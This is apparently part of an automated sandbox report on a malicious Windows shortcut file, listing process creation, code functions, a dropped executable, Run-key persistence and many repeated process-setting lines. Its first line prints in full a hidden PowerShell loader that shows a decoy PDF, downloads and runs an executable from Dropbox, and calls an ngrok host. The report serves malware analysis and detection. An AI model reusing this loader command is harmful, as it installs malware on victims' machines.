                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }"
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe.19.drStatic PE information: real checksum: 0x22448d should be: 0x2d97e4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848F442F0 pushad ; ret 3_2_00007FF848F442FD
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848F18426 pushad ; ret 19_2_00007FF848F1845D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848F1845E push eax; ret 19_2_00007FF848F1846D
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_0046A0C9 push ecx; ret 25_2_0046A0DC
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_00404268 push ebp; retf 25_2_00404269
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_0271B86D push ebx; ret 26_3_0271B864
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_0271A840 push ebp; retf 26_3_0271A841
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_0271E83C pushad ; ret 26_3_0271E841
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_0271E80E push eax; iretd 26_3_0271E81D
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_0271A0F9 push FFFFFF82h; iretd 26_3_0271A0FB
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_0271D8A0 push 0000002Eh; iretd 26_3_0271D8A2
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_02718904 push ecx; ret 26_3_02718917
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_0271B1DD push eax; ret 26_3_0271B1DF
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_02719F6A push eax; ret 26_3_02719F75
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_0271B70B push ebx; ret 26_3_0271B864
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_0271E586 pushad ; retf 26_3_0271E599
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_2_0046A0C9 push ecx; ret 26_2_0046A0DC
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_2_00404268 push ebp; retf 26_2_00404269
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03284920 push 0000002Eh; iretd 27_3_03284922
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03285F0C push es; iretd 27_3_03285F0D
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03281179 push FFFFFF82h; iretd 27_3_0328117B
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_0328278B push ebx; ret 27_3_032828E4
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03280FEA push eax; ret 27_3_03280FF5
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03285FEE push FFFFFFD2h; retf 27_3_03286011
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03285606 pushad ; retf 27_3_03285619
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03286012 push 00000038h; iretd 27_3_0328601D
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_0328225D push eax; ret 27_3_0328225F
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_032858BC pushad ; ret 27_3_032858C1
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_0328588E push eax; iretd 27_3_0328589D
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_032828ED push ebx; ret 27_3_032828E4
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_032818C0 push ebp; retf 27_3_032818C1
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe.19.drStatic PE information: section name: .text entropy: 6.829135429512295
                      Source: PerfectoUna.exe.25.drStatic PE information: section name: .text entropy: 6.829135429512295

                      Persistence and Installation Behavior

                      barindex
                      Windows shortcut file (LNK) starts blacklisted processes
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Drops PE files to the document folder of the user
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeFile created: C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeFile created: C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_004029A0 StartServiceCtrlDispatcherW,GetLastError,25_2_004029A0
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nuinsa
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nuinsa

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
